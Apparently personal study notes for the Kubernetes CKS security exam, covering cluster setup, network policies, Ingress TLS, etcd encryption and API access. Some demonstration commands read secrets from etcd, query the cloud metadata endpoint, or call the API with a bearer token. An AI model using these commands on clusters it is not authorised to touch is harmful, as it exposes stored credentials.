     • You can right click with the mouse and select Paste, or press CTRL + SHIFT + V

tmux

tmux will allow you to use multiple terminal windows in one (aka terminal multiplexing). Make sure you know the basics for tmux usage:

  • tmux - Start and enter tmux
  • CTRL + b " - Split the window vertically (line is horizontal)
  • CTRL + b % - Split the window horizontally (line is vertical)
  • CTRL + b <ARROW KEY> - Switch between window panes
  • CTRL + b (hold) <ARROW KEY> - Resize current window pane
  • CTRL + b z - Toggle a pane between full screen and its normal size (good for looking at a full document)
  • CTRL + d or exit - Close a window pane

Mouse Support

If you want to be able to click and select within tmux and tmux panes, you can also enable mouse support. This can be useful.

These steps must be done outside of tmux

  1. Create a .tmux.conf file and edit it

    • vim ~/.tmux.conf
  2. Add the configuration, save, and exit file

    • set -g mouse on
  3. Reload tmux configuration

    • tmux source .tmux.conf

Preparation

Study Resources

Practice

Fundamentals

  • You should already have CKA level knowledge
  • Linux Kernel Namespaces isolate containers
    • PID Namespace: Isolates processes
    • Mount Namespace: Restricts access to mounts or root filesystem
    • Network Namespace: Only access certain network devices. Firewall and routing rules
    • User Namespace: Different set of UIDs are used. Example: User (UID 0) inside one namespace can be different from user(UID 0) inside another namespace
  • cgroups restrict resource usage of processes
    • RAM/Disk/CPU
  • Using cgroups and linux kernel namespaces, we can create containers

Understand the Kubernetes Attack Surface

  • Kubernetes is a complex system with many components. Each component has its own vulnerabilities and attack vectors.
  • The attack surface can be reduced by:
    • Using network policies to restrict traffic between pods
    • Using RBAC to restrict access to the kube-api server
    • Using admission controllers to enforce security policies
    • Using pod security standards to enforce security policies
    • Using best practices to secure the underlying infrastructure
    • Using securityContext to enforce security policies for pods

The 4 C’s of Cloud-Native Security

  • Cloud: Security of the cloud infrastructure
  • Cluster: Security of the cluster itself
  • Container: Security of the containers themselves
  • Code: Security of the code itself

1 Cluster Setup

CIS Benchmark

What is a security benchmark?

  • A security benchmark is a set of standard benchmarks that define a state of optimized security for a given system (servers, network devices, etc.)
  • CIS (Center for Internet Security) provides standardized benchmarks (in the form of downloadable files) that one can use to implement security on their system.
  • CIS provides benchmarks for public clouds (Azure, AWS, GCP, etc.), operating systems (Linux, Windows, MacOS), network devices (Cisco, Juniper, HP, etc.), mobile devices (Android and Apple), desktop and server software (such as Kubernetes)
  • View more info here
  • You must register at the CIS website to download benchmarks
  • Each benchmark provides a description of a vulnerability, as well as a path to resolution.
  • CIS-CAT is a tool you can run on a system to generate recommendations for a given system. There are two versions available for download, CIS-CAT Lite and CIS-CAT Pro. The Lite version only includes benchmarks for Windows 10, MacOS, Ubuntu, and desktop software (Google Chrome, etc.). The Pro version includes all benchmarks.
  • CIS Benchmarks for Kubernetes
    • Register at the CIS website and download the CIS Benchmarks for kubernetes
    • Includes security benchmarks for master and worker nodes

KubeBench

  • KubeBench is an alternative to CIS-CAT Pro to run benchmarks against a Kubernetes cluster.
  • KubeBench is open source and maintained by Aqua Security
  • KubeBench can be deployed as a Docker container or a pod. It can also be invoked directly from the binaries or compiled from source.
  • Once run, kube-bench will scan the cluster to identify whether best practices have been implemented. It will output a report specifying which benchmarks have passed or failed and will tell you how to fix any failed benchmarks.
  • You can view the report by tailing the pod logs of the kube-bench pod.

Cluster Upgrades

  • The controller-manager and kube-scheduler can be one minor revision behind the API server.
    • For example, if the API server is at version 1.10, controller-manager and kube-scheduler can be at 1.9 or 1.10
  • The kubelet and kube-proxy can be up to 2 minor revisions behind the API server
  • kubectl can be one minor version newer or older than the kube API server
  • You can upgrade the cluster one minor version at a time

Upgrade Process

  • Drain and cordon the node before upgrading it
    • kubectl drain <node name> --ignore-daemonsets
  • Upgrade the master node first.
  • Upgrade worker nodes after the master node.

Upgrading with Kubeadm

  • If the cluster was created with kubeadm, you can use kubeadm to upgrade it.
  • The upgrade process with kubeadm:
    # Increase the minor version in the apt repository file for kubernetes:
      sudo vi /etc/apt/sources.list.d/kubernetes.list
    
    # Determine which version to upgrade to
      sudo apt update
      sudo apt-cache madison kubeadm
    
    # Upgrade kubeadm first
      sudo apt-mark unhold kubeadm && \
      sudo apt-get update && sudo apt-get install -y kubeadm='1.31.x-*' && \
      sudo apt-mark hold kubeadm
    
    # Verify the version of kubeadm
      kubeadm version
    
    # Check the kubeadm upgrade plan
      sudo kubeadm upgrade plan
    
    # Apply the upgrade plan
      sudo kubeadm upgrade apply v1.31.x
    
    # Upgrade the nodes
      sudo kubeadm upgrade node
    
    # Upgrade kubelet and kubectl
      sudo apt-mark unhold kubelet kubectl && \
      sudo apt-get update && sudo apt-get install -y kubelet='1.31.x-*' kubectl='1.31.x-*' && \
      sudo apt-mark hold kubelet kubectl
    
    # Restart the kubelet
      sudo systemctl daemon-reload
      sudo systemctl restart kubelet
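    
    # Uncordon the node so workloads can be scheduled on it again
      kubectl uncordon <node name>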
    

Network Policies

Overview

  • Kubernetes Network Policies allow you to control the flow of traffic to and from pods. They define rules that specify:

    • What traffic is allowed to reach a set of pods.
    • What traffic a set of pods can send out.
  • Pods can communicate with each other by default. Network Policies allow you to restrict this communication.

  • Network Policies operate at Layer 3 and Layer 4 (IP and TCP/UDP). They do not cover Layer 7 (application layer).

  • Network Policies are additive: to grant additional network access, simply create another network policy with the extra rules; the union of all matching policies applies.

  • Network Policies are implemented by the network plugin. The network plugin must support NetworkPolicy for the policies to take effect.

  • Network Policies are namespace-scoped. They apply to pods in the same namespace.

  • For example, a default deny-all ingress policy for the ‘secure-namespace’ namespace:

    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata:
      name: default-deny-all
      namespace: secure-namespace
    spec:
      podSelector: {}
      policyTypes:
      - Ingress
    
  • Say we now want to grant the ‘frontend’ pods (label ‘tier: frontend’) in the ‘app’ namespace access to the ‘backend’ pods in ‘secure-namespace’. We can do that by creating another Network Policy like this:

    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata:
      name: allow-app-pods
      namespace: secure-namespace
    spec:
        podSelector:
          matchLabels:
            tier: backend
        policyTypes:
        - Ingress
        ingress:
        - from:
          - namespaceSelector:
              matchLabels:
                name: app
            podSelector:
              matchLabels:
                tier: frontend
          ports:
          - protocol: TCP
            port: 3000
    
    

Key Concepts

  1. Namespace Scope: Network policies are applied at the namespace level.
  2. Selector-Based Rules:
    • Pod Selector: Select pods the policy applies to.
    • Namespace Selector: Select pods based on their namespace.
  3. Traffic Direction:
    • Ingress: Traffic coming into the pod.
    • Egress: Traffic leaving the pod.
  4. Default Behavior:
    • Pods are non-isolated by default (accept all traffic).
    • A pod becomes isolated when a network policy matches it.

Common Fields in a Network Policy

  • podSelector: Specifies the pods the policy applies to.
  • ingress/egress: Lists rules for ingress or egress traffic.
  • from/to: Specifies allowed sources/destinations (can use IP blocks, pod selectors, or namespace selectors).
  • ports: Specifies allowed ports and protocols.
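
  • To see which policies exist and which pods they select (names below reuse the examples from this section):

    kubectl get networkpolicy -A                                          # list policies in all namespaces
    kubectl describe networkpolicy default-deny-all -n secure-namespace   # shows selectors and allow rules
    kubectl get pods -n secure-namespace --show-labels                    # confirm which pods the selector matches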

Example Network Policies

Allow All Ingress Traffic

```
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-all-ingress
  namespace: default
spec:
  podSelector: {}
  ingress:
  - {}
```

Deny All Ingress and Egress Traffic

```
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-all
  namespace: default
spec:
  podSelector: {}
  policyTypes:
  - Ingress
  - Egress
  ingress: []
  egress: []

```

Allow Specific Ingress from a Namespace

```
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-namespace-ingress
  namespace: default
spec:
  podSelector:
    matchLabels:
      app: my-app
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          team: frontend
```

Allow Egress to a Specific IP

```
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-egress-specific-ip
  namespace: default
spec:
  podSelector:
    matchLabels:
      app: my-app
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 192.168.1.0/24
    ports:
    - protocol: TCP
      port: 8080
```

Cilium Network Policy

  • Cilium Network Policies provide more granularity, flexibility, and features than traditional Kubernetes Network Policies
  • Cilium Network Policies operate up to layer 7 of the OSI model. Traditional Network Policies only operate up to layer 4.
  • Cilium Network Policies perform well because they are implemented with eBPF
  • Hubble allows you to watch traffic going to and from pods
  • You can add Cilium to the cluster by:
    • Deploying with helm
    • Running cilium install after you install the cilium CLI tool
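
  • A minimal install sketch (chart repo and CLI commands per the Cilium docs; version pins omitted):

    # option 1: Helm
    helm repo add cilium https://helm.cilium.io/
    helm repo update
    helm install cilium cilium/cilium --namespace kube-system

    # option 2: Cilium CLI
    cilium install
    cilium status --wait

    # watch pod traffic with Hubble
    cilium hubble enable
    cilium hubble port-forward &
    hubble observe --namespace default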

Cilium Network Policy Structure

  • Cilium Network Policies are defined in YAML files
  • The structure is similar to Kubernetes Network Policies

Layer 3 Rules

  • Endpoints Based - Apply the policy to pods based on Kubernetes label selectors
  • Services Based - Apply the policy based on kubernetes services, controlling traffic based on service names rather than individual pods
  • Entities Based - Cilium has pre-defined entities like cluster, host, and world. This type of policy uses these entities to determine what traffic the policy is applied to.
    • Cluster - Represents all kubernetes endpoints
      • Example:
        apiVersion: cilium.io/v2
        kind: CiliumNetworkPolicy
        metadata:
          name: allow-egress-to-cluster-resources
        spec:
          endpointSelector: {}
          egress:
          - toEntities:
            - cluster
        
    • World - Represents any external traffic, but not cluster traffic
      apiVersion: cilium.io/v2
      kind: CiliumNetworkPolicy
      metadata:
        name: allow-egress-to-external-resources
      spec:
        endpointSelector: {}
        egress:
        - toEntities:
          - world
      
    • Host - Represents the local kubernetes node
    • Remote-node - Represents traffic from a remote node
    • All - Represents all endpoints both internal and external to the cluster
      apiVersion: cilium.io/v2
      kind: CiliumNetworkPolicy
      metadata:
        name: allow-egress-to-all
      spec:
        endpointSelector: {}
        egress:
        - toEntities:
          - all
      
  • Node Based - Apply the policy based on nodes in the cluster
  • IP/CIDR Based - Apply the policy based on IP addresses or CIDR blocks

Layer 4 Rules

  • If no layer 4 rules are defined, all traffic is allowed for layer 4
  • Example:
      apiVersion: "cilium.io/v2"
      kind: CiliumNetworkPolicy
      metadata:
        name: allow-external-80
      spec:
        endpointSelector:
          matchLabels:
            run: curl
        egress:
          - toPorts:
            - ports:
              - port: "80"
                protocol: TCP
    

Layer 7 Rules
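
  • A hedged sketch of an HTTP-aware rule (field layout per the Cilium L7 policy docs; the label, port, and path are assumptions). It allows only GET /public to the selected pods; other methods and paths on port 80 are rejected at layer 7:

```sh
kubectl apply -f - <<EOF
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: allow-get-public
spec:
  endpointSelector:
    matchLabels:
      app: backend
  ingress:
  - toPorts:
    - ports:
      - port: "80"
        protocol: TCP
      rules:
        http:
        - method: "GET"
          path: "/public"
EOF
```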

Deny Policies

  • You can create deny policies to explicitly block traffic
  • Deny policies take precedence over allow policies
  • ingressDeny Example:
    apiVersion: "cilium.io/v2"
    kind: CiliumNetworkPolicy
    metadata:
      name: deny-ingress-80-for-backend
    spec:
      endpointSelector:
        matchLabels:
          app: backend
      ingressDeny:
      - fromEntities:
        - all
      - toPorts:
        - ports:
          - port: "80"
            protocol: TCP
    
  • egressDeny Example:
    apiVersion: "cilium.io/v2"
    kind: CiliumNetworkPolicy
    metadata:
      name: "deny-egress"
    spec:
      endpointSelector:
        matchLabels:
          app: random-pod
      egress:
      - toEntities:
        - all
      egressDeny:
      - toEndpoints:
        - matchLabels:
            app: server
    

Examples

Default Deny All

In Cilium, any endpoint selected by a policy with an ingress section goes into default-deny for ingress; only explicitly allowed traffic gets through. The policy below selects every endpoint and allows ingress only from the world entity, so all other ingress (including traffic from other pods) is denied:

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: default-deny-all
spec:
  endpointSelector: {}
  ingress:
  - fromEntities:
    - world

Kubernetes Ingress

What is Ingress?

  • Ingress is an API object that manages external access to services in a Kubernetes cluster, typically HTTP and HTTPS.
  • Provides:
    • Load balancing
    • SSL termination
    • Name-based virtual hosting

Why Use Ingress?

  • To consolidate multiple service endpoints behind a single, externally accessible URL.
  • Reduce the need for creating individual LoadBalancers or NodePort services.

Key Components of Ingress

  1. Ingress Controller

    • Software that watches for Ingress resources and implements the rules.
    • Popular Ingress controllers:
      • ingress-nginx
      • Traefik
      • HAProxy
      • Istio Gateway
    • Must be installed separately in the cluster.
  2. Ingress Resource

    • The Kubernetes object that defines how requests should be routed to services.

Ingress Resource Configuration

  • As of Kubernetes 1.20, you can create an ingress using kubectl:
    kubectl create ingress <name> --rule="host/path=service:port"
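
  • For example (host, service names, and ports are placeholders):

    kubectl create ingress example-ingress \
      --rule="example.com/*=web-service:80" \
      --rule="example.com/api/*=api-service:8080" \
      --dry-run=client -o yaml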
    

Basic Structure

```
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: example-ingress
spec:
  rules:
    - host: example.com
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: example-service
                port:
                  number: 80
```

Ingress with TLS

  • When no TLS secret is configured, the NGINX ingress controller serves a default self-signed (“fake”) certificate for HTTPS. To view it, first determine the HTTPS port of the ingress controller service:

    kubeadmin@kube-controlplane:~$ k get svc -n ingress-nginx
    NAME                                 TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)                      AGE
    ingress-nginx-controller             NodePort    10.103.169.156   <none>        80:31818/TCP,443:30506/TCP   38m
    ingress-nginx-controller-admission   ClusterIP   10.103.26.228    <none>        443/TCP                      38m
    kubeadmin@kube-controlplane:~$
    
  • The HTTPS port is 30506 in this case. To view the self-signed certificate, we can use curl:

     λ notes $ curl https://13.68.211.113:30506/service1 -k -v
    * (304) (OUT), TLS handshake, Finished (20):
    } [52 bytes data]
    * SSL connection using TLSv1.3 / AEAD-AES256-GCM-SHA384 / [blank] / UNDEF
    * ALPN: server accepted h2
    * Server certificate:
    *  subject: O=Acme Co; CN=Kubernetes Ingress Controller Fake Certificate             <<<<<<<<<<<<<<<<
    *  start date: Dec 20 14:23:08 2024 GMT
    *  expire date: Dec 20 14:23:08 2025 GMT
    *  issuer: O=Acme Co; CN=Kubernetes Ingress Controller Fake Certificate
    *  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
    * using HTTP/2
    * [HTTP/2] [1] OPENED stream for https://13.68.211.113:30506/service1
    * [HTTP/2] [1] [:method: GET]
    * [HTTP/2] [1] [:scheme: https]
    * [HTTP/2] [1] [:authority: 13.68.211.113:30506]
    * [HTTP/2] [1] [:path: /service1]
    * [HTTP/2] [1] [user-agent: Mozilla/5.0 Gecko]
    * [HTTP/2] [1] [accept: */*]
    > GET /service1 HTTP/2
    > Host: 13.68.211.113:30506
    > User-Agent: Mozilla/5.0 Gecko
    > Accept: */*
    
  • To configure an Ingress resource to use TLS (HTTPS), we first need to create a certificate:

    # create a new 2048-bit RSA private key and associated cert
    openssl req -nodes -new -x509 -keyout my.key -out my.crt -subj "/CN=example.com"
    
  • Next, create a secret for the tls cert:

    kubectl create secret tls mycert --cert=my.crt --key=my.key -n my-namespace
    
  • Create the ingress:

    apiVersion: networking.k8s.io/v1
    kind: Ingress
    metadata:
      name: secure-ingress
      annotations:
        nginx.ingress.kubernetes.io/ssl-redirect: "true"
    spec:
      tls:
        - hosts:
            - example.com
          secretName: mycert
      rules:
        - host: example.com
          http:
            paths:
              - path: /
                pathType: Prefix
                backend:
                  service:
                    name: secure-service
                    port:
                      number: 80
    

Annotations

  • Extend the functionality of Ingress controllers.
  • Common examples (specific to nginx):
    • nginx.ingress.kubernetes.io/rewrite-target: Rewrite request paths.
    • nginx.ingress.kubernetes.io/ssl-redirect: Force SSL.
    • nginx.ingress.kubernetes.io/proxy-body-size: Limit request size.

Protecting Node Metadata and Endpoints

Protecting Endpoints

- Kubernetes clusters expose information on various ports:

    | Port Range  | Purpose                  |
    | ----------- | ------------------------ |
    | 6443        | kube-apiserver           |
    | 2379 - 2380 | etcd                     |
    | 10250       | kubelet API              |
    | 10259       | kube-scheduler           |
    | 10257       | kube-controller-manager  |

- Many of these ports are configurable. For example, to change the port that kube-api listens on, just modify `--secure-port` in the kube-api manifest.
- Set up firewall rules to minimize the attack surface
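
- For example, with ufw (the CIDRs below are placeholders for an admin network and the control-plane subnet):

    # API server reachable only from the admin network
    ufw allow from 10.0.0.0/24 to any port 6443 proto tcp
    ufw deny 6443/tcp
    # etcd reachable only from the other control-plane nodes
    ufw allow from 10.0.1.0/24 to any port 2379:2380 proto tcp
    ufw deny 2379:2380/tcp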

Securing Node Metadata

  • A lot of information can be obtained from node metadata

    • Node name
    • Node state
    • annotations
    • System Info
    • etc.
  • Why secure node metadata?

    • If node metadata is tampered with, pods may be assigned to the wrong nodes, which has security implications to consider
    • You can determine the version of kubelet and other kubernetes components from node metadata
    • If an attacker can modify node metadata, they could taint all the nodes, making them unschedulable
  • Protection Strategies

    • Use RBAC to control who has access to modify node metadata
    • Node isolation using labels and node selectors
    • Audit logs to determine who is accessing the cluster and respond accordingly
    • Update node operating systems regularly
    • Update cluster components regularly
  • Cloud providers such as Amazon and Azure often expose node information via metadata endpoints on the node. These endpoints are important to protect.

  • This endpoint can be accessed at 169.254.169.254 on nodes in both Azure and AWS. An example for Azure:

    curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | jq
    
  • Node metadata endpoints can be prevented from being accessed by pods by creating network policies.

    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata:
      name: deny-egress-metadata-server
      namespace: a12
    spec:
      policyTypes:
      - Egress
      podSelector: {}
      egress:
      - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
            - 169.254.169.254/32
    

Verify Kubernetes Binaries

  • The SHA sum of a file changes if the content within the file is changed
  • You can download the release binaries with wget. Example: wget -O /opt/kubernetes.tar.gz https://dl.k8s.io/v1.31.1/kubernetes.tar.gz
  • To validate that a binary downloaded from the internet has not been modified, verify its checksum:
    echo "$(cat kubectl.sha256)  kubectl" | sha256sum --check
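
  • Full flow for kubectl (the version is an example; the URLs follow the dl.k8s.io release layout):

    curl -LO "https://dl.k8s.io/release/v1.31.1/bin/linux/amd64/kubectl"
    curl -LO "https://dl.k8s.io/release/v1.31.1/bin/linux/amd64/kubectl.sha256"
    echo "$(cat kubectl.sha256)  kubectl" | sha256sum --check   # prints "kubectl: OK" on success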
    

Securing etcd

  • etcd is a distributed key-value store that Kubernetes uses to store configuration data
  • etcd by default listens on port 2379/tcp

Play with etcd

Step 1: Create the Base Binaries Directory

```sh
    mkdir /root/binaries
    cd /root/binaries
```

Step 2: Download and Copy the ETCD Binaries to Path

```sh
    wget https://github.com/etcd-io/etcd/releases/download/v3.5.18/etcd-v3.5.18-linux-amd64.tar.gz

    tar -xzvf etcd-v3.5.18-linux-amd64.tar.gz

    cd /root/binaries/etcd-v3.5.18-linux-amd64/

    cp etcd etcdctl /usr/local/bin/
```

Step 3: Start etcd

```sh
    cd /tmp
    etcd
```

Step 4: Verification - Store and Fetch Data from etcd

```sh
    etcdctl put key1 "value1"
```

```sh
    etcdctl get key1
```

Encrypting data in transit in etcd

  • etcd supports TLS encryption for data in transit
  • By default, etcd packaged with kubeadm is configured to use TLS encryption
  • One can capture packets from etcd using tcpdump:
          root@controlplane00:/var/lib/etcd/member# tcpdump -i lo -X port 2379
    
          tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
          listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
          16:10:01.691453 IP localhost.2379 > localhost.42040: Flags [P.], seq 235868994:235869033, ack 3277609642, win 640, options [nop,nop,TS val 1280288044 ecr 1280288042], length 39
                  0x0000:  4500 005b 35e4 4000 4006 06b7 7f00 0001  E..[5.@.@.......
                  0x0010:  7f00 0001 094b a438 0e0f 1342 c35c 5aaa  .....K.8...B.\Z.
                  0x0020:  8018 0280 fe4f 0000 0101 080a 4c4f a52c  .....O......LO.,
                  0x0030:  4c4f a52a 1703 0300 2289 00d8 5dcc 7b88  LO.*...."...].{.
                  0x0040:  6f7a 290f 536b 0fd0 f7d9 1fb4 f83f 4aab  oz).Sk.......?J.
                  0x0050:  a6e7 0af8 0835 e597 a93d 4d              .....5...=M
          16:10:01.691479 IP localhost.42040 > localhost.2379: Flags [.], ack 39, win 14819, options [nop,nop,TS val 1280288044 ecr 1280288044], length 0
                  0x0000:  4500 0034 7174 4000 4006 cb4d 7f00 0001  E..4qt@.@..M....
                  0x0010:  7f00 0001 a438 094b c35c 5aaa 0e0f 1369  .....8.K.\Z....i
                  0x0020:  8010 39e3 fe28 0000 0101 080a 4c4f a52c  ..9..(......LO.,
                  0x0030:  4c4f a52c                                LO.,
          16:10:01.691611 IP localhost.2379 > localhost.42040: Flags [P.], seq 39:1222, ack 1, win 640, options [nop,nop,TS val 1280288044 ecr 1280288044], length 1183
                  0x0000:  4500 04d3 35e5 4000 4006 023e 7f00 0001  E...5.@.@..>....
                  0x0010:  7f00 0001 094b a438 0e0f 1369 c35c 5aaa  .....K.8...i.\Z.
                  0x0020:  8018 0280 02c8 0000 0101 080a 4c4f a52c  ............LO.,
                  0x0030:  4c4f a52c 1703 0304 9ac0 c579 d4ed 808c  LO.,.......y....
    
                  ..... redacted
    
  • The traffic captured in the output above is encrypted.

Encrypting data at rest in etcd

  • By default, the API server stores plain-text representations of resources into etcd, with no at-rest encryption.

  • etcd stores data in the /var/lib/etcd/member directory. When the database is not encrypted, one can easily grep the contents of this directory, looking for secrets:

    root@controlplane00:/var/lib/etcd/member# ls -lisa
    total 16
    639000 4 drwx------ 4 root root 4096 Mar 21 10:53 .
    385187 4 drwx------ 3 root root 4096 Mar 21 10:52 ..
    639002 4 drwx------ 2 root root 4096 Mar 21 14:43 snap
    638820 4 drwx------ 2 root root 4096 Mar 21 11:59 wal
    
    root@controlplane00:/var/lib/etcd/member# grep -R test-secret .
    grep: ./wal/00000000000000ac-0000000000a9340b.wal: binary file matches
    grep: ./wal/00000000000000a8-0000000000a721c1.wal: binary file matches
    grep: ./wal/00000000000000aa-0000000000a83f1e.wal: binary file matches
    grep: ./wal/00000000000000a9-0000000000a7b97e.wal: binary file matches
    grep: ./wal/00000000000000ab-0000000000a8d8a7.wal: binary file matches
    grep: ./snap/db: binary file matches
    
  • The kube-apiserver process accepts an argument --encryption-provider-config that specifies a path to a configuration file. The contents of that file, if you specify one, control how Kubernetes API data is encrypted in etcd.

  • If you are running the kube-apiserver without the --encryption-provider-config command line argument, you do not have encryption at rest enabled. If you are running the kube-apiserver with the --encryption-provider-config command line argument, and the file that it references specifies the identity provider as the first encryption provider in the list, then you do not have at-rest encryption enabled (the default identity provider does not provide any confidentiality protection.)

  • If you are running the kube-apiserver with the --encryption-provider-config command line argument, and the file that it references specifies a provider other than identity as the first encryption provider in the list, then you already have at-rest encryption enabled. However, that check does not tell you whether a previous migration to encrypted storage has succeeded.

  • Example EncryptionConfiguration:

      apiVersion: apiserver.config.k8s.io/v1
      kind: EncryptionConfiguration
      resources:
        - resources:
            - secrets
            - configmaps
            - pandas.awesome.bears.example # a custom resource API
          providers:
            # This configuration does not provide data confidentiality. The first
            # configured provider is specifying the "identity" mechanism, which
            # stores resources as plain text.
            #
            - identity: {} # plain text, in other words NO encryption
            - aesgcm:
                keys:
                  - name: key1
                    secret: c2VjcmV0IGlzIHNlY3VyZQ==
                  - name: key2
                    secret: dGhpcyBpcyBwYXNzd29yZA==
            - aescbc:
                keys:
                  - name: key1
                    secret: c2VjcmV0IGlzIHNlY3VyZQ==
                  - name: key2
                    secret: dGhpcyBpcyBwYXNzd29yZA==
            - secretbox:
                keys:
                  - name: key1
                    secret: YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXoxMjM0NTY=
        - resources:
            - events
          providers:
            - identity: {} # do not encrypt Events even though *.* is specified below
        - resources:
            - '*.apps' # wildcard match requires Kubernetes 1.27 or later
          providers:
            - aescbc:
                keys:
                - name: key2
                  secret: c2VjcmV0IGlzIHNlY3VyZSwgb3IgaXMgaXQ/Cg==
        - resources:
            - '*.*' # wildcard match requires Kubernetes 1.27 or later
          providers:
            - aescbc:
                keys:
                - name: key3
                  secret: c2VjcmV0IGlzIHNlY3VyZSwgSSB0aGluaw==
    
  • Each resources array item is a separate config and contains a complete configuration. The resources.resources field is an array of Kubernetes resource names (resource or resource.group) that should be encrypted like Secrets, ConfigMaps, or other resources.

  • https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/

  • After enabling encryption in etcd, any resources that you created prior to enabling encryption will not be encrypted. To (re-)encrypt existing Secrets, rewrite them:

kubectl get secrets -A -o yaml | kubectl replace -f -
  • Example of getting a secret in etcd:
root@controlplane00:/etc/kubernetes/pki# ETCDCTL_API=3 etcdctl --cacert=./etcd/ca.crt --cert=./apiserver-etcd-client.crt --key=./apiserver-etcd-client.key get /registry/secrets/default/mysecret

/registry/secrets/default/mysecret
k8s:enc:aescbc:v1:key1:ܨt>;8ܑ%TUIodEs*lsHGwjeF8S!Aqaj\Pq;9Ⱥ7dJe{B2=|p4#'BuCxUY,*IuFM
                                                                                   wxx@
2Q0e5UzH^^)rX_H%GUɈ-XqC.˽pC `kBW>K12 n

The path to a resource in the etcd database is ‘/registry/<resource type>/<namespace>/<resource name>’

Securing kube-apiserver

  • Kube-apiserver acts as the gateway for all resources in kubernetes. Kube-apiserver is the only component in kubernetes that communicates with etcd
  • kube-apiserver authenticates to etcd using TLS client certificates.
  • Kube-apiserver should encrypt data before it is stored in etcd
  • kube-apiserver should only listen on an HTTPS endpoint. There was an option to host kube-apiserver on an HTTP endpoint, but this option has been deprecated as of 1.10 and removed in 1.22
  • kube-apiserver should have auditing enabled

Authentication

  • One can authenticate to the KubeAPI server using certificates or a kubeconfig file

Access Controls

  • After a request is authenticated, it is authorized. Authorization is the process of determining what actions a user can perform.
  • Multiple authorization modules are supported:
    • AlwaysAllow - Allows all requests
    • AlwaysDeny - Blocks all requests
    • RBAC - Role-based access control for requests. This is the default authorization module in kubernetes
    • Node - Authorizes kubelets to access the kube-api server
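
  • To see which modes are enabled on a kubeadm cluster, and to test what a given identity can do:

    grep authorization-mode /etc/kubernetes/manifests/kube-apiserver.yaml
    kubectl auth can-i list pods --as=system:serviceaccount:default:default
    kubectl auth can-i '*' '*' --as=some-user    # '*' checks any verb on any resource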

2 Cluster Hardening

Securing Access to the KubeAPI Server

  • A request to the KubeAPI server goes through 4 stages before it is processed by KubeAPI:
    • Authentication
      • Validates the identity of the caller by inspecting client certificates or tokens
    • Authorization
      • The authorization stage verifies that the identity found in the first stage can access the verb and resource in the request
    • Admission Controllers
      • Admission Control verifies that the request is well-formed and may modify it before proceeding
    • Validation
      • This stage ensures that the request is valid.
  • You can determine the endpoint for the kubeapi server by running: kubectl cluster-info
  • KubeAPI is also exposed via a service named ‘kubernetes’ in the default namespace
    kubeadmin@kube-controlplane:~$ k get svc kubernetes -n default -o yaml
      apiVersion: v1
      kind: Service
      metadata:
        creationTimestamp: "2024-11-11T10:57:42Z"
        labels:
          component: apiserver
          provider: kubernetes
        name: kubernetes
        namespace: default
        resourceVersion: "234"
        uid: 768d1a22-91ff-4ab3-8cd7-b86340fc319a
      spec:
        clusterIP: 10.96.0.1
        clusterIPs:
        - 10.96.0.1
        internalTrafficPolicy: Cluster
        ipFamilies:
        - IPv4
        ipFamilyPolicy: SingleStack
        ports:
        - name: https
          port: 443
          protocol: TCP
          targetPort: 6443
        sessionAffinity: None
        type: ClusterIP
      status:
        loadBalancer: {}
    
    • The endpoint of the kube-api server is also exposed to pods via environment variables:
    kubeadmin@kube-controlplane:~$ k exec -it other -- /bin/sh -c 'env | grep -i kube'
     KUBERNETES_SERVICE_PORT=443
     KUBERNETES_PORT=tcp://10.96.0.1:443
     KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
     KUBERNETES_PORT_443_TCP_PORT=443
     KUBERNETES_PORT_443_TCP_PROTO=tcp
     KUBERNETES_SERVICE_PORT_HTTPS=443
     KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
     KUBERNETES_SERVICE_HOST=10.96.0.1
    
    

Authentication

  • There are two types of accounts that would need access to a cluster: Humans and Machines. There is no such thing as a ‘user account’ primitive in Kubernetes.

User accounts

  • Developers, cluster admins, etc.

Service Accounts

  • Service Accounts are created and managed by the Kubernetes API and can be used for machine authentication
  • To create a service account: kubectl create serviceaccount <account name>
  • Service accounts are namespaced
  • When a service account is created, it has a token created automatically. The token is stored as a secret object.
  • You can also use the token (base64-decode it if you copied it from the secret) to communicate with the Kube API Server: curl https://172.16.0.1:6443/api --insecure --header "Authorization: Bearer <token value>"
  • You can grant service accounts permission to the cluster itself by binding them to a role with a rolebinding. If a pod needs access to the cluster where it is hosted, you configure the automountServiceAccountToken boolean parameter on the pod and assign it a service account that has the appropriate permissions. The token will be mounted into the pod's filesystem, where the pod can read it. The secret is mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.
  • A service account named ‘default’ is automatically created in every namespace
  • As of kubernetes 1.22, tokens are automatically mounted to pods by an admission controller as a projected volume.
    • https://github.com/kubernetes/enhancements/blob/master/keps/sig-auth/1205-bound-service-account-tokens/README.md
  • As of Kubernetes 1.24, when you create a service account, a secret is no longer created automatically for the token. Now you must run kubectl create token <service account name> to create the token.
    • https://github.com/kubernetes/enhancements/issues/2799
  • One can also manually create a token for a service account:
kubectl create token <service-account-name> --duration=100h
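
  • End-to-end sketch (the API server address is a placeholder):

kubectl create serviceaccount app-sa
TOKEN=$(kubectl create token app-sa --duration=1h)
curl --insecure https://<api-server>:6443/api --header "Authorization: Bearer ${TOKEN}"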

TLS Certificates

  • Server certificates are used to communicate with clients
